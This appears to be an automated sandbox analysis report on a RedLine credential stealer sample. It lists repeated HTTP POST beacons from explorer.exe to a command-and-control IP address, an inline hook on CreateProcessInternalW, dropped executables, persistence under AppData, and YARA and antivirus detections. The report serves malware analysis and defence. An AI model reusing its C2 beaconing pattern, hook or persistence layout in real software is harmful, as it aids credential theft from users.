                                                                                                                                                                                                                      Dec 15, 2024 09:17:23.301408052 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:17:23.421226978 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:17:24.920087099 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:17:23 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      58192.168.2.849868185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:17:25.145057917 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:17:25.264854908 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:17:26.589452028 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:17:25 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      59192.168.2.849871185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:17:26.817475080 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:17:26.937372923 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:17:28.437232018 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:17:27 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      60192.168.2.849877185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:17:28.660773993 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:17:28.780580044 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:17:30.106364965 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:17:29 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      61192.168.2.849878185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:17:30.346568108 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:17:30.466931105 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:17:31.949158907 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:17:30 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      62192.168.2.849884185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:17:32.176670074 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:17:32.296473980 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:17:33.620358944 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:17:32 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      63192.168.2.849885185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:17:33.851774931 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:17:33.971862078 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:17:35.467638016 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:17:34 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      64192.168.2.849891185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:17:39.076564074 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:17:39.196396112 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:17:39.816704988 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:17:38 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Code Manipulations

                                                                                                                                                                                                                      User Modules

                                                                                                                                                                                                                      Hook Summary

                                                                                                                                                                                                                      Function NameHook TypeActive in Processes
                                                                                                                                                                                                                      CreateProcessInternalWINLINEexplorer.exe

                                                                                                                                                                                                                      Processes

                                                                                                                                                                                                                      Process: explorer.exe, Module: KERNEL32.DLL
                                                                                                                                                                                                                      Function NameHook TypeNew Data
                                                                                                                                                                                                                      CreateProcessInternalWINLINE0xE9 0x90 0x00 0x07 0x75 0x5D

                                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                      Behavior

                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                      Start time:03:15:29
                                                                                                                                                                                                                      Start date:15/12/2024
                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\3Qv3xyyL5G.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\3Qv3xyyL5G.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff785310000
                                                                                                                                                                                                                      File size:309'760 bytes
                                                                                                                                                                                                                      MD5 hash:DA8FEE4A89F0B7CEE6C8AEE970044116
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:1
                                                                                                                                                                                                                      Start time:03:15:29
                                                                                                                                                                                                                      Start date:15/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\audiodg.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\audiodg.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff6ec840000
                                                                                                                                                                                                                      File size:632'808 bytes
                                                                                                                                                                                                                      MD5 hash:627DEA21175691FDE4495877C53B4C87
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                                      Start time:03:15:29
                                                                                                                                                                                                                      Start date:15/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\svchost.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff67e6d0000
                                                                                                                                                                                                                      File size:55'320 bytes
                                                                                                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                      Start time:03:15:29
                                                                                                                                                                                                                      Start date:15/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\msiexec.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff7ee060000
                                                                                                                                                                                                                      File size:69'632 bytes
                                                                                                                                                                                                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:5
                                                                                                                                                                                                                      Start time:03:15:29
                                                                                                                                                                                                                      Start date:15/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                                      Imagebase:0x7ff62d7d0000
                                                                                                                                                                                                                      File size:5'141'208 bytes
                                                                                                                                                                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000003.1603564510.000000000A37C000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                                      Start time:03:15:37
                                                                                                                                                                                                                      Start date:15/12/2024
                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exe
                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exe"
                                                                                                                                                                                                                      Imagebase:0xa90000
                                                                                                                                                                                                                      File size:307'712 bytes
                                                                                                                                                                                                                      MD5 hash:7B6730CA4DA283A35C41B831B9567F15
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000000.1604653153.0000000000A92000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1823760251.0000000002E56000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exe, Author: Joe Security
                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                      • Detection: 92%, ReversingLabs
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                                      Start time:03:15:41
                                                                                                                                                                                                                      Start date:15/12/2024
                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff6dad70000
                                                                                                                                                                                                                      File size:309'760 bytes
                                                                                                                                                                                                                      MD5 hash:DA8FEE4A89F0B7CEE6C8AEE970044116
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                                      Start time:03:15:41
                                                                                                                                                                                                                      Start date:15/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\svchost.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff67e6d0000
                                                                                                                                                                                                                      File size:55'320 bytes
                                                                                                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                                      Start time:03:15:41
                                                                                                                                                                                                                      Start date:15/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\audiodg.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\audiodg.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff6ec840000
                                                                                                                                                                                                                      File size:632'808 bytes
                                                                                                                                                                                                                      MD5 hash:627DEA21175691FDE4495877C53B4C87
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:10
                                                                                                                                                                                                                      Start time:03:15:41
                                                                                                                                                                                                                      Start date:15/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\msiexec.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff7ee060000
                                                                                                                                                                                                                      File size:69'632 bytes
                                                                                                                                                                                                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:12
                                                                                                                                                                                                                      Start time:03:15:47
                                                                                                                                                                                                                      Start date:15/12/2024
                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff729340000
                                                                                                                                                                                                                      File size:5'915'958 bytes
                                                                                                                                                                                                                      MD5 hash:B40682DDC13C95E3C0228D09A3B6AAE2
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                      • Detection: 34%, ReversingLabs
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:13
                                                                                                                                                                                                                      Start time:03:15:49
                                                                                                                                                                                                                      Start date:15/12/2024
                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff729340000
                                                                                                                                                                                                                      File size:5'915'958 bytes
                                                                                                                                                                                                                      MD5 hash:B40682DDC13C95E3C0228D09A3B6AAE2
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:14
                                                                                                                                                                                                                      Start time:03:15:49
                                                                                                                                                                                                                      Start date:15/12/2024
                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff6dad70000
                                                                                                                                                                                                                      File size:309'760 bytes
                                                                                                                                                                                                                      MD5 hash:DA8FEE4A89F0B7CEE6C8AEE970044116
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:15
                                                                                                                                                                                                                      Start time:03:15:49
                                                                                                                                                                                                                      Start date:15/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\svchost.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff67e6d0000
                                                                                                                                                                                                                      File size:55'320 bytes
                                                                                                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:16
                                                                                                                                                                                                                      Start time:03:15:49
                                                                                                                                                                                                                      Start date:15/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\audiodg.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\audiodg.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff6ec840000
                                                                                                                                                                                                                      File size:632'808 bytes
                                                                                                                                                                                                                      MD5 hash:627DEA21175691FDE4495877C53B4C87
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Target ID:17
                                                                                                                                                                                                                      Start time:03:15:49
                                                                                                                                                                                                                      Start date:15/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\msiexec.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff7ee060000
                                                                                                                                                                                                                      File size:69'632 bytes
                                                                                                                                                                                                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                        Execution Coverage:43.2%
                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                        Signature Coverage:50%
                                                                                                                                                                                                                        Total number of Nodes:480
                                                                                                                                                                                                                        Total number of Limit Nodes:11
